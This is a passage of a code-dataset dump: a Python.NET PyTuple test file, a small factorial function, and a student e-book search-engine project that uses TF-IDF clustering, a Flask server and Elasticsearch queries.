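clr.AddReference("System")   # same mechanism conftest.py uses for Python.Test

from System import DateTime  # a .NET type surfaced through Python.NET
print(DateTime.Now.Year)
```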
{
"alpha_fraction": 0.5042441487312317,
"alphanum_fraction": 0.5105093121528625,
"avg_line_length": 32.43243408203125,
"blob_id": "b09ac11990680b14ad64f7a243d2170ec0875d24",
"content_id": "88910147c204b85403af46777d3efd6bc20aa516",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C#",
"length_bytes": 4948,
"license_type": "permissive",
"max_line_length": 140,
"num_lines": 148,
"path": "/src/embed_tests/pytuple.cs",
"repo_name": "zfq308/pythonnet",
"src_encoding": "UTF-8",
"text": "using System;\nusing NUnit.Framework;\nusing Python.Runtime;\n\nnamespace Python.EmbeddingTest\n{\n public class PyTupleTest\n {\n /// <summary>\n /// Tests set-up. Being used to skip class on Travis/PY27\n /// </summary>\n /// <remarks>\n /// FIXME: Fails on Travis/PY27: All tests below (unless otherwise stated)\n /// Fatal Python error: auto-releasing thread-state, but no thread-state for this thread\n /// Stacktrace:\n /// at (wrapper managed-to-native) Python.Runtime.Runtime.PyGILState_Release (intptr)\n /// at Python.Runtime.PythonEngine.ReleaseLock (intptr)\n /// at Python.Runtime.PythonException.Dispose ()\n /// at Python.Runtime.PythonException.Finalize ()\n /// at (wrapper runtime-invoke) object.runtime_invoke_virtual_void__this__ (object,intptr,intptr,intptr)\n /// </remarks>\n [SetUp]\n public void SetUp()\n {\n if (Environment.GetEnvironmentVariable(\"TRAVIS\") == \"true\" &&\n Environment.GetEnvironmentVariable(\"TRAVIS_PYTHON_VERSION\") == \"2.7\")\n {\n Assert.Ignore(\"Fails on Travis/PY27: Fatal Python error: auto-releasing thread-state, but no thread-state for this thread\");\n }\n }\n\n /// <summary>\n /// Test IsTupleType without having to Initialize a tuple.\n /// PyTuple constructor use IsTupleType. This decouples the tests.\n /// </summary>\n /// <remarks>\n /// Travis PY27 intermittently fails this test. Indicates issue is\n /// most likely with PyTuple.IsTupleType\n /// </remarks>\n [Test]\n public void TestStringIsTupleType()\n {\n using (Py.GIL())\n {\n var s = new PyString(\"foo\");\n Assert.IsFalse(PyTuple.IsTupleType(s));\n }\n }\n\n /// <summary>\n /// Test IsTupleType with Tuple.\n /// </summary>\n [Test]\n public void TestPyTupleIsTupleType()\n {\n using (Py.GIL())\n {\n var t = new PyTuple();\n Assert.IsTrue(PyTuple.IsTupleType(t));\n }\n }\n\n [Test]\n public void TestPyTupleEmpty()\n {\n using (Py.GIL())\n {\n var t = new PyTuple();\n Assert.AreEqual(0, t.Length());\n }\n }\n\n /// <remarks>\n /// FIXME: Unable to unload AppDomain, Unload thread timed out.\n /// Seen on Travis/AppVeyor on both PY2 and PY3. Causes Embedded_Tests\n /// to hang after they are finished for ~40 seconds until nunit3 forces\n /// a timeout on unloading tests. Doesn't fail the tests though but\n /// greatly slows down CI. 
nunit2 silently has this issue.\n /// </remarks>\n [Test]\n [Ignore(\"GH#397: Travis/AppVeyor: Unable to unload AppDomain, Unload thread timed out\")]\n public void TestPyTupleInvalidAppend()\n {\n using (Py.GIL())\n {\n PyObject s = new PyString(\"foo\");\n var t = new PyTuple();\n Assert.Throws<PythonException>(() => t.Concat(s));\n }\n }\n\n [Test]\n public void TestPyTupleValidAppend()\n {\n using (Py.GIL())\n {\n var t0 = new PyTuple();\n var t = new PyTuple();\n t.Concat(t0);\n Assert.IsNotNull(t);\n Assert.IsInstanceOf(typeof(PyTuple), t);\n }\n }\n\n [Test]\n public void TestPyTupleStringConvert()\n {\n using (Py.GIL())\n {\n PyObject s = new PyString(\"foo\");\n PyTuple t = PyTuple.AsTuple(s);\n Assert.IsNotNull(t);\n Assert.IsInstanceOf(typeof(PyTuple), t);\n Assert.AreEqual(\"f\", t[0].ToString());\n Assert.AreEqual(\"o\", t[1].ToString());\n Assert.AreEqual(\"o\", t[2].ToString());\n }\n }\n\n [Test]\n public void TestPyTupleValidConvert()\n {\n using (Py.GIL())\n {\n var l = new PyList();\n PyTuple t = PyTuple.AsTuple(l);\n Assert.IsNotNull(t);\n Assert.IsInstanceOf(typeof(PyTuple), t);\n }\n }\n\n /// <remarks>\n /// FIXME: Possible source of intermittent AppVeyor PY27: Unable to unload AppDomain.\n /// FIXME: Intermittent Issue on Travis PY33: Fatal Python error: PyMUTEX_LOCK(gil_mutex) failed. Seen twice.\n /// </remarks>\n [Test]\n public void TestNewPyTupleFromPyTuple()\n {\n using (Py.GIL())\n {\n var t0 = new PyTuple();\n var t = new PyTuple(t0);\n Assert.IsNotNull(t);\n Assert.IsInstanceOf(typeof(PyTuple), t);\n }\n }\n }\n}\n"
}
] | 2 |
pdmahadevan/gittest
|
https://github.com/pdmahadevan/gittest
|
933e0464e145317ddb0d7e3e01ceedeed77f4cc9
|
4a163655bf4caa33bf65c6d993f4dbcca5fc5862
|
e6f1726007f918c0aab295559a20392cbdf5d5f0
|
refs/heads/master
| 2021-01-19T10:14:47.717262 | 2017-04-10T18:19:43 | 2017-04-10T18:19:43 | 87,843,544 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4655172526836395,
"alphanum_fraction": 0.517241358757019,
"avg_line_length": 18.33333396911621,
"blob_id": "5772d738b764dc4f1c78dcf3875c1c39c98d921e",
"content_id": "b9a96bd60b00ccc2547f46ef45cba6719e1e6553",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 3,
"path": "/test1.py",
"repo_name": "pdmahadevan/gittest",
"src_encoding": "UTF-8",
"text": "def fac(n):\n if n==1: return 1;\n return n*fac(n-1);\n"
}
] | 1 |
Aishwarya20/be-project-search-engine
|
https://github.com/Aishwarya20/be-project-search-engine
|
3dcf6d881f16e3fbc7671e1e510c528c0092a125
|
1cfb89c2e66b138a240da66d2c5c4716c0cd7403
|
1f4e6780e6023e32f79b1406b2450eb55f78778c
|
refs/heads/master
| 2021-01-19T23:43:31.782635 | 2017-04-30T09:20:51 | 2017-04-30T09:20:51 | 89,004,660 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.639848530292511,
"alphanum_fraction": 0.6473305225372314,
"avg_line_length": 36.66428756713867,
"blob_id": "2aad0b851f939d975b144701315505fc7aaa5ce9",
"content_id": "fac796ddb46797c0402f521a977b7757a80834a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10826,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 280,
"path": "/cluster_text.py",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "# raw text-> removal of stop words, tokenize and stem using nltk Snowball\r\n# created tf-idf matrix using scikit. Feature names are extracted and used as labels in dendrogram\r\n# created similarity matrix using cosine similarity\r\n# k-means clustering for documents and words. Here we start with a k=2 value and increase it in every iteration\r\n# Use the cosine distance between data points and cetroid to decide on the k value\r\n#The minute the value becomes same we stop the iteration with different k values\r\n#To cross check we can see that the _inertia value reaches the elbow point generally used to determine the k value\r\n#dumping the document similarity and word similarity matrix into a json file for chord diagram\r\nfrom __future__ import print_function\r\nfrom collections import Counter\r\nfrom nltk.corpus import stopwords\r\nimport re\r\nimport codecs\r\nimport pandas as pd\r\nfrom nltk.stem.snowball import SnowballStemmer\r\nimport os\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity,euclidean_distances\r\nfrom scipy.cluster.hierarchy import ward, dendrogram,linkage,fcluster,cophenet,distance\r\nimport scipy.cluster.hierarchy as hier\r\nimport matplotlib.pyplot as plt\r\nimport json\r\nimport random\r\nimport numpy as np\r\nfrom collections import defaultdict\r\nimport sys\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.externals import joblib\r\nfrom decimal import *\r\n#creating a set of stopwords provided by nltk\r\nstopword=set(stopwords.words(\"english\"))\r\n#instatiating the class SnowballStemmer for stemming and getting root words\r\nstemmer=SnowballStemmer(\"english\")\r\n\r\ndef get_cluster_classes(den, label='ivl'):\r\n cluster_idxs = defaultdict(list)\r\n for c, pi in zip(den['color_list'], den['icoord']):\r\n for leg in pi[1:3]:\r\n i = (leg - 5.0) / 10.0\r\n if abs(i - int(i)) < 1e-5:\r\n cluster_idxs[c].append(int(i))\r\n\r\n cluster_classes ={}\r\n for c, l in cluster_idxs.items():\r\n i_l = [den[label][i] for i in l]\r\n cluster_classes[c] = i_l\r\n\r\n return cluster_classes\r\n\r\ndef tokenize(raw_text):\r\n tokens=re.findall('[a-zA-Z]+',raw_text.lower())\r\n return set(tokens)-stopword\r\n\r\ndef tokenize_and_stem(raw_text):\r\n tokens=re.findall('[a-zA-Z]+',raw_text.lower())\r\n allwords_tokenize=set(tokens) - stopword\r\n return [stemmer.stem(t) for t in allwords_tokenize if len(t)>2]\r\n\r\ndef get_files(raw_path):\r\n files_extracted=[]\r\n root_extracted=[]\r\n print (\"Files in: \" +raw_path)\r\n root_extracted.append(raw_path)\r\n for current_doc_id, current_file in enumerate(os.listdir(raw_path)):\r\n files_extracted.append(current_file)\r\n return files_extracted,root_extracted\r\n\r\n\r\n\r\ndef linkage_matrix_rep(sim_matrix):\r\n methods=['average','single','complete','weighted']\r\n c_final=0.0\r\n method_final=''\r\n final_linkage=linkage(sim_matrix)\r\n for method in methods:\r\n linkage_matrix = linkage(sim_matrix,method=method)\r\n c, coph_dists = cophenet(linkage_matrix, distance.pdist(sim_matrix))\r\n if c>c_final:\r\n c_final=c\r\n final_linkage=linkage_matrix\r\n method_final=method\r\n cd_final=coph_dists\r\n return c_final,method_final,final_linkage,cd_final\r\n\r\ndef file_extract(roots,files):\r\n genre_doc=[]\r\n for root in roots:\r\n for filename in files:\r\n with codecs.open(root+'\\\\'+filename, \"r\",encoding='utf-8', errors='ignore') as file_name:\r\n text=file_name.read()\r\n 
genre_doc.append(text)\r\n return genre_doc\r\n\r\ndef main(args):\r\n #input directory\r\n dir_to_process=args\r\n files,roots=get_files(dir_to_process)\r\n\r\n\r\n totalvocab_tokenized=[]\r\n totalvocab_stemmed=[]\r\n\r\n ebook=\"\"\r\n ebooks=[]\r\n doc_name=[]\r\n\r\n\r\n #tokenization,removal of stopwords,stemming\r\n for root in roots:\r\n for filename in files:\r\n with codecs.open(root+'\\\\'+filename, \"r\",encoding='utf-8', errors='ignore') as file_name:\r\n text=file_name.read()\r\n\r\n ebook=ebook+\"\\n\"+text\r\n ebooks.append(text)\r\n\r\n doc_name.append(filename)\r\n allwords_tokenize=tokenize(text)\r\n\r\n totalvocab_stemmed.extend([stemmer.stem(t) for t in allwords_tokenize])\r\n totalvocab_tokenized.extend(allwords_tokenize)\r\n file_name.close()\r\n\r\n vocab_frame = pd.DataFrame({'words': totalvocab_tokenized}, index = totalvocab_stemmed)\r\n print ('there are ' + str(vocab_frame.shape[0]) + ' items in vocab_frame')\r\n print (vocab_frame.head())\r\n\r\n #Creation of tf-idf matrix and vectorizer\r\n tfidf_vectorizer = TfidfVectorizer(max_features=200,min_df=0.01,\r\n stop_words='english',\r\n tokenizer=tokenize_and_stem,ngram_range=(1,3),dtype='double')\r\n tfidf_matrix= tfidf_vectorizer.fit_transform(ebooks) #fit the vectorizer to synopses\r\n terms = tfidf_vectorizer.get_feature_names()\r\n\r\n #cosine distance for documents\r\n doc_sim =1-cosine_similarity(tfidf_matrix)\r\n\r\n # clustering using hierarchical clustering for documents\r\n #doc_cophen:cophenectic correlation value,doc_method:method used for calculating cophenetic distance,doc_linkage_matrix:linkage matrix,doc_cd:cophenetic distance\r\n doc_cophen,doc_method,doc_linkage_matrix,doc_cd = linkage_matrix_rep(doc_sim)\r\n\r\n #k-means clustering:document-document clustering\r\n num_clusters = 2\r\n getcontext().prec=2\r\n avg_distance=0.0\r\n flag=True\r\n prev_iter=0.0\r\n current_iter=0.0\r\n random.seed(10)\r\n while flag:\r\n km = KMeans(n_clusters=num_clusters,n_init= 1)\r\n km.fit(tfidf_matrix)\r\n joblib.dump(km,'doc_cluster.pkl')\r\n #km = joblib.load('doc_cluster.pkl')\r\n clusters = km.labels_.tolist()\r\n print(km.inertia_)\r\n centers=km.cluster_centers_\r\n sum_dist=0.0\r\n for i in range(0,len(doc_name)):\r\n clus=clusters[i]\r\n center=centers[clus:]\r\n doc=tfidf_matrix[i:]\r\n dist=1-cosine_similarity(doc,center)\r\n sum_dist=sum_dist+dist[0][0]\r\n avg=Decimal(sum_dist)/Decimal(len(doc_name))\r\n #print (sum_dist)\r\n print(avg)\r\n current_iter=Decimal(avg)-Decimal(avg_distance)\r\n if Decimal(prev_iter)-Decimal(current_iter)==Decimal(0):\r\n flag=False\r\n else:\r\n prev_iter=current_iter\r\n num_clusters=num_clusters+1\r\n\r\n print(clusters)\r\n cluster_doc=pd.DataFrame({\"doc_cluster\":clusters,\"doc_name\":doc_name})\r\n cluster_doc.to_csv('doc_to_cluster_map.csv',sep=',',index=False)\r\n\r\n #formation of dendrogram for document-document similarity\r\n fig, ax = plt.subplots(figsize=(15,20)) # set size\r\n ax = dendrogram(doc_linkage_matrix, orientation=\"left\", labels=doc_name)\r\n plt.tick_params(\\\r\n axis= 'x', # changes apply to the x-axis\r\n which='both', # both major and minor ticks are affected\r\n bottom='off', # ticks along the bottom edge are off\r\n top='off', # ticks along the top edge are off\r\n labelbottom='off')\r\n\r\n plt.tight_layout() #show plot with tight layout\r\n\r\n #save figure of the document clustering dendrogram\r\n plt.savefig('cosine_cluster_doc_test.png', dpi=200) #save figure as ward_clusters\r\n\r\n #getting the cluster to which document 
belongs\r\n doc_classes=get_cluster_classes(ax)\r\n thresh_doc=len(doc_classes)\r\n print(thresh_doc)\r\n\r\n #creating csv file containing document cluster,doc_id,doc_name\r\n cluster_index={}\r\n i=0\r\n doc_id=[]\r\n book_name=[]\r\n for c in doc_classes.keys():\r\n cluster_index[c]=i\r\n i=i+1\r\n for c in doc_classes.keys():\r\n for files in doc_classes[c]:\r\n doc_id.append(cluster_index[c])\r\n book_name.append(files)\r\n\r\n #Starting word clustering\r\n #word to word similarity\r\n word_vector=tfidf_matrix.transpose()\r\n word_vector=word_vector.A\r\n\r\n word_sim=1-cosine_similarity(word_vector)\r\n #print (word_sim)\r\n\r\n #linkage matrix created for the words\r\n word_cophen,word_method,word_linkage_matrix,word_cd = linkage_matrix_rep(word_sim)\r\n #print (word_cophen)\r\n #print (word_method)\r\n fig, ax = plt.subplots(figsize=(15, 20))\r\n final_terms=[]\r\n for term in terms:\r\n final_terms.append(vocab_frame.ix[term].values.tolist()[0][0])\r\n\r\n ax = dendrogram(word_linkage_matrix, orientation=\"left\",labels=final_terms,show_contracted=True)\r\n plt.tick_params(\\\r\n axis= 'x', # changes apply to the x-axis\r\n which='both', # both major and minor ticks are affected\r\n bottom='off', # ticks along the bottom edge are off\r\n top='off', # ticks along the top edge are off\r\n labelbottom='off')\r\n\r\n plt.tight_layout() #show plot with tight layout\r\n #saving figure of word-word clustering\r\n plt.savefig('cosine_cluster_word_test.png', dpi=200) #save figure as ward_clusters\r\n\r\n #Constructing a chord diagram\r\n r = lambda: random.randint(0,255)\r\n color=[]\r\n for i in range(len(doc_name)):\r\n color.append('#%02X%02X%02X' % (r(),r(),r()))\r\n\r\n #chord diagram:document-document similarity\r\n #color of arcs of document-document chord diagram\r\n doc_color=pd.DataFrame({'doc':doc_name,'color':color})\r\n doc_color.to_csv('C:\\Users\\Aishwarya Sadasivan\\Python_Codes\\js\\dataset_doc.csv',sep=',',index=False)\r\n #creating json matrix of the document similarity matrix for percentage similarity chord diagram\r\n doc_sim_list=cosine_similarity(tfidf_matrix).tolist()\r\n #print(doc_sim_list)\r\n with open('C:\\Users\\Aishwarya Sadasivan\\Python_Codes\\js\\doc_cos_dist.json', 'r') as f:\r\n json_data = json.load(f)\r\n json_data= doc_sim_list\r\n with open('C:\\Users\\Aishwarya Sadasivan\\Python_Codes\\js\\doc_cos_dist.json', 'w') as f:\r\n f.write(json.dumps(json_data))\r\n\r\n\r\n #chord diagram:word-word similarity\r\n #colors of the arcs of chord diagram\r\n color_word=[]\r\n for i in range(len(terms)):\r\n color_word.append('#%02X%02X%02X' % (r(),r(),r()))\r\n word_color=pd.DataFrame({'word':terms,'color':color_word})\r\n word_color.to_csv('C:\\Users\\Aishwarya Sadasivan\\Python_Codes\\js\\dataset-1_word.csv',sep=',',index=False)\r\n\r\n #purpose of displaying percentage of similarity in chord diagram\r\n word_sim_list=cosine_similarity(word_vector).tolist()\r\n #print(word_sim_list)\r\n\r\n with open('C:\\Users\\Aishwarya Sadasivan\\Python_Codes\\js\\word_cos_dist.json', 'wb') as outfile:\r\n json.dump(word_sim_list, outfile)\r\n outfile.close()\r\n\r\n\r\nif __name__=='__main__':\r\n main(sys.argv[1])\r\n"
},
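linkage_matrix_rep above picks, among four linkage methods, the one whose cophenetic correlation with the original cosine distances is highest. A compact sketch of that selection on a tiny invented corpus:

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from scipy.cluster.hierarchy import linkage, cophenet
from scipy.spatial.distance import pdist

docs = ["the cat sat", "a cat and a dog", "markets fell today", "stock markets rallied"]
sim = 1 - cosine_similarity(TfidfVectorizer().fit_transform(docs))

# Keep the method with the best cophenetic correlation, as linkage_matrix_rep does
best = max(["average", "single", "complete", "weighted"],
           key=lambda m: cophenet(linkage(sim, method=m), pdist(sim))[0])
print(best)
```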
{
"alpha_fraction": 0.5182892680168152,
"alphanum_fraction": 0.5649971961975098,
"avg_line_length": 31.907407760620117,
"blob_id": "063088b65e63dc71fe8450cd856016830c460416",
"content_id": "16763c8f3baa5e9eef7511fbeff06b38291d555c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1777,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 54,
"path": "/template/content.html",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n\n<html lang=\"en\">\n <title>Files for download</title>\n <head>\n <link rel=\"stylesheet\" href=\"http://127.0.0.1:5000/js/css/StyleSheet.css\" type=\"text/css\"/>\n\n\n\t</head>\n<body style=\"background-image:url(http://127.0.0.1:5000/js/css/uploads/book_background_like-4.jpg)\">\n\n\t\t <div id=\"header\">\n\t\t<div id=\"title\"><i>Reader's Paradise</i></div>\n\t\t<div id=\"slogan\">Dive into the world of reading!</div>\n\t\t<div id=\"nav\">\n\t\t<ul>\n\t\t<a href=\"http://127.0.0.1:5000/js/feedback.html\"><li><span class=\"fa fa-users\"></span> FEEDACK</li></a>\n <a href=\"#\"><li> DATA VISUALISATION\n <ul>\n \t\t<a href=\"http://127.0.0.1:5000/js/datavisualisation.html\"><li> DOCUMENT SIMILARITY</li></a>\n \t\t<a href=\"http://127.0.0.1:5000/js/visualization_word.html\"><li> WORD SIMILARITY</li></a>\n \t\t</ul>\n\n</li></a>\n\n <a href=\"http://127.0.0.1:5000/js/search.html\"><li><span class=\"fa fa-inr\"></span> SEARCH</li></a>\n\t\t<a href=\"http://127.0.0.1:5000/js/home.html\"><li><span class=\"fa fa-home\"></span>HOME</li></a>\n\t\t</ul>\n\t\t</div>\n\n<div class=\"col_1\" style=\"height:auto\">\n<h3>Showing results for:{{query}}</h3>\n<h4>Click to download the books below!</h4>\n{% for key,value in dloads.iteritems() %}\n {% for file in dloads[key]%}\n {% set inner_loop=loop %}\n\n {% if inner_loop.index0 == 0 %}\n <br>\n Book Name:<a href=\"{{ file }}\" download>{{ keys[key][inner_loop.index0] }}</a>\n <h5>Related Books:</h5>\n {% if count[key] == 1 %}\n <li>No related books found!</li>\n {% endif %}\n\n {% else %}\n\n <li>Book Name:<a href=\"{{ file }}\" download>{{ keys[key][inner_loop.index0] }}</a></li>\n {% endif %}\n\n {% endfor %}\n{% endfor %}\n</div>\n</html>\n"
},
{
"alpha_fraction": 0.5795121788978577,
"alphanum_fraction": 0.5924389958381653,
"avg_line_length": 34.60714340209961,
"blob_id": "4046355d4b0dd7f83403ea53ecf45e7047f8aa2e",
"content_id": "4397678346b1d63c70ff162e11dcde2705d8c451",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4100,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 112,
"path": "/server.py",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "#back-end : The clustering module is first invoked\r\n#front-end server side script to help bring together the various modules\r\n#two tabs search by conetent and search by author/book title exist. For both the modules separate vocabulary for quicker front end validation\r\n#elasticsearch is invoked to perform searching on the ingested documents\r\n#doc.html->this page displays retrieves the search result(ninja template)\r\n#query.html->this shall take the query and pass it to text segment, spell check as well as language modelling\r\nimport spell_check as sc\r\nimport text_segment as ts\r\nimport language_model as lm\r\nfrom flask import Flask\r\nfrom flask import request\r\nfrom flask import render_template,send_from_directory\r\nimport string\r\nimport re\r\nfrom nltk.corpus import stopwords\r\nfrom collections import Counter\r\nfrom elasticsearch import Elasticsearch\r\nimport sys\r\nimport extract_books as eb\r\nstopword=set(stopwords.words(\"english\"))\r\nes=Elasticsearch()\r\napp = Flask(__name__,static_folder='js',template_folder='template')\r\n\r\[email protected]('/js/<path:path>/')\r\ndef static_page(page_name):\r\n return send_from_directory('js' ,path)\r\n\r\[email protected]('/',methods=[\"GET\",\"POST\"])\r\ndef process_author():\r\n\r\n answer1=' '.join(i for i in sc.display_author(request.form['query_author'].lower()))\r\n print answer1\r\n\r\n answer2=ts.display_segment_author(answer1)\r\n print answer2\r\n\r\n final=lm.display_lang_author(answer2)\r\n dloads=[]\r\n keys=[]\r\n error=\"\"\r\n if final == \"\":\r\n error=\"No results to found\"\r\n else:\r\n tokens=re.findall(\"[a-zA-Z']+\",final.lower())\r\n new_tokens=list(set(tokens)-stopword)\r\n new_final=' '.join(new_tokens)\r\n res=es.search(index=\"top100\",body={\"query\":{\"bool\":\r\n {\"should\":\r\n [{\"match\":{\"author\":new_final}},\r\n {\"match\":{\"title\":new_final}}\r\n ],\r\n \"minimum_should_match\" : 1\r\n }\r\n }})\r\n\r\n for hit in res['hits']['hits']:\r\n keys.append(hit['_source']['title'])\r\n dloads.append(\"http://127.0.0.1:5000/js/Dataset-1/\"+hit['_source']['bookname'])\r\n\r\n\r\n\r\n return render_template('doc.html',dloads=dloads,keys=keys,query=final,error=error)\r\n\r\n #return '<br>'.join(s2.extract_book_path(final))\r\n\r\[email protected]('/query.html',methods=[\"GET\",\"POST\"])\r\ndef process_content():\r\n\r\n answer_content1=' '.join(i for i in sc.display_content(request.form['query_content'].lower()))\r\n print answer_content1\r\n answer_content2=ts.display_segment_content(answer_content1)\r\n print answer_content2\r\n final_content=lm.display_lang_content(answer_content2)\r\n dloads={}\r\n keys={}\r\n error=\"\"\r\n count={}\r\n if final_content == \"\":\r\n error= \"No results to found\"\r\n else:\r\n tokens=re.findall(\"[a-zA-Z']+\",final_content.lower())\r\n new_tokens=list(set(tokens)-stopword)\r\n new_final_content=' '.join(new_tokens)\r\n\r\n res=es.search(index=\"top100\",body={\"query\":\r\n {\"match\":{\"text\":new_final_content}},\r\n })\r\n flag=[]\r\n n_clusters=[]\r\n for hit in res['hits']['hits']:\r\n n_clusters.append(hit['_source']['cluster'])\r\n count=Counter(n_clusters)\r\n for key in count:\r\n dloads[key]=[]\r\n keys[key]=[]\r\n for i in range(0,len(res['hits']['hits'])):\r\n flag.append(False)\r\n for hit1 in res['hits']['hits']:\r\n i=0\r\n for hit2 in res['hits']['hits']:\r\n if hit1['_source']['cluster'] == hit2['_source']['cluster'] and flag[i] == False:\r\n 
dloads[hit1['_source']['cluster']].append(\"http://127.0.0.1:5000/js/Dataset-1/\"+hit2['_source']['bookname'])\r\n keys[hit1['_source']['cluster']].append(hit2['_source']['title'])\r\n flag[i]=True\r\n i=i+1\r\n\r\n return render_template('content.html',dloads=dloads,keys=keys,count=count,query=final_content,error=error)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n"
},
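The author/title lookup in process_author above boils down to a bool/should query with minimum_should_match. A stripped-down sketch of the same request; the index name 'top100' comes from ingest.py, and the search term is arbitrary:

```python
from elasticsearch import Elasticsearch

es = Elasticsearch()
body = {"query": {"bool": {
    "should": [{"match": {"author": "stevenson"}},
               {"match": {"title": "stevenson"}}],
    "minimum_should_match": 1,
}}}
res = es.search(index="top100", body=body)
for hit in res["hits"]["hits"]:
    print(hit["_source"]["title"], hit["_source"]["bookname"])
```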
{
"alpha_fraction": 0.7776097059249878,
"alphanum_fraction": 0.7965204119682312,
"avg_line_length": 65.0999984741211,
"blob_id": "40b1e34fbb67cb1965326d8e0c250293777871e5",
"content_id": "e838d5abdd6758962ab01828ee6d392fd5714b31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1322,
"license_type": "no_license",
"max_line_length": 178,
"num_lines": 20,
"path": "/README.md",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "Search Engine For an E-book Portal\n\nFollowing are the modules implemented\n1. Spell Checker: This helps correct spelling using the edit distance method\n2.Text Segmentation: Segments the text using the bigram model\n3.Language Modelling: Corrects the sequence of words to the most cooherent using the bigram model\n\nNote: In cluster_text.py : the path for storing the csv and json files,requried to form the chord diagram, has been hardcoded to the js directory ensure to change it to your path\nin your directory. (Line number:251,255,258,268,274)\n\nPre-requisites to the project:\n1. Ensure the files-extract_books,cluster_text,spell_check,language_model,text_segment are in the same folder as server.py\n2.The folders Dataset-1,js,static and template must be loacted where server.py is\n3. Remember to copy your dataset into js folder, else the documents won't download.\n\nRunning the project\n1. We first run cluster_text.py to form the clusters for the given dataset. This may require several re-runs but once the \nresult converges we save it as a model using joblib. cluster_text.py run as python cluster_text.py \"path_to_dataset\"\n2. We then ingest the documents along with the clustering information by running ingest.py as python ingest.py \"path_to_dataset\"\n3. Finally, we run server.py as python server.py \"path_to_dataset\"\n"
},
{
"alpha_fraction": 0.5646575093269348,
"alphanum_fraction": 0.5797260403633118,
"avg_line_length": 35.138614654541016,
"blob_id": "c2ff5e656297351c053c0b9c91c21f449fc600af",
"content_id": "fcbc30431e0d0b7de66098fa134ce82d160fce0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3650,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 101,
"path": "/ingest.py",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "import os\nimport re\nimport sys\nfrom datetime import datetime\nfrom elasticsearch import Elasticsearch\nimport codecs\nes = Elasticsearch()\n\ndef extract_title_author(file_name):\n contents = open(file_name).read()\n title_re = re.compile(r\"Title\\:.+\")\n author_re = re.compile(r\"Author\\:.+\")\n\n title_match = title_re.search(contents)\n author_match = author_re.search(contents)\n\n title = \"\"\n author = \"\"\n\n if title_match:\n title = title_match.group()\n title = title.strip().replace(\"Title: \", \"\")\n\n if author_match:\n author = author_match.group()\n author = author.strip().replace(\"Author: \", \"\")\n\n return (title, author)\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n dir_to_process = sys.argv[1]\n else:\n print \"Please specify input directory\"\n sys.exit(-1)\n\n file_to_save = open(\"authors.txt\", \"w\")\n ebook_cluster={}\n with open(\"doc_to_cluster_map.csv\") as csv_file:\n for row in csv_file:\n value,index= row.split(',')\n #print value,index\n ebook_cluster[index.replace(\"\\n\",\"\")]=value\n #print ebook_cluster\n\n\n\n info = {\n \"1jcfs10.txt\": {\"title\": \"The History of the Thirty Years' War\", \"author\": \"Friedrich Schiller\"},\n \"10028.txt\":{\"title\":\"Spalding's Official Baseball Guide - 1913\",\"author\":\"John B. Foster\"},\n \"allry10.txt\":{\"title\":\"Contributions to All The Year Round\",\"author\":\"Charles Dickens\"},\n \"balen10.txt\":{\"title\":\"The Tale of Balen\",\"author\":\"Algernon Charles Swinburne\"},\n \"baleng2.txt\":{\"title\":\"Ancient Poems,Ballads and Songs of the Peasantry of England\",\"author\":\"Robert Bell\"},\n \"batlf10.txt\":{\"title\":\"The Battle of Life\",\"author\":\"Charles Dickens\"},\n \"bgopr10.txt\":{\"title\":\"The Beggar's Opera\",\"author\":\"John Gay\"},\n \"bstjg10.txt\":{\"title\":\"Beast in the Jungle\",\"author\":\"Henry James\"},\n \"crsnk10.txt\":{\"title\":\"The Cruise of the Snark\",\"author\":\"Jack London\"},\n \"mklmt10.txt\":{\"title\":\"the Makaloa Mat/Island Tales\",\"author\":\"London\"},\n \"mspcd10.txt\":{\"title\":\"Miscellaneous Papers\",\"author\":\"Charles Dickens\"},\n \"rlsl110.txt\":{\"title\":\"The Letters of Robert Louis Stevenson\",\"author\":\"Robert Louis Stevenson\"},\n \"rlsl210.txt\":{\"title\":\"Letters of Robert Louis Stevenson\",\"author\":\"Robert Louis Stevenson\"},\n \"sesli10.txt\":{\"title\":\"Sesame and Lilies\",\"author\":\"John Ruskin\"},\n \"svyrd10.txt\":{\"title\":\"Songs of a Savoyard\",\"author\":\"W. S. 
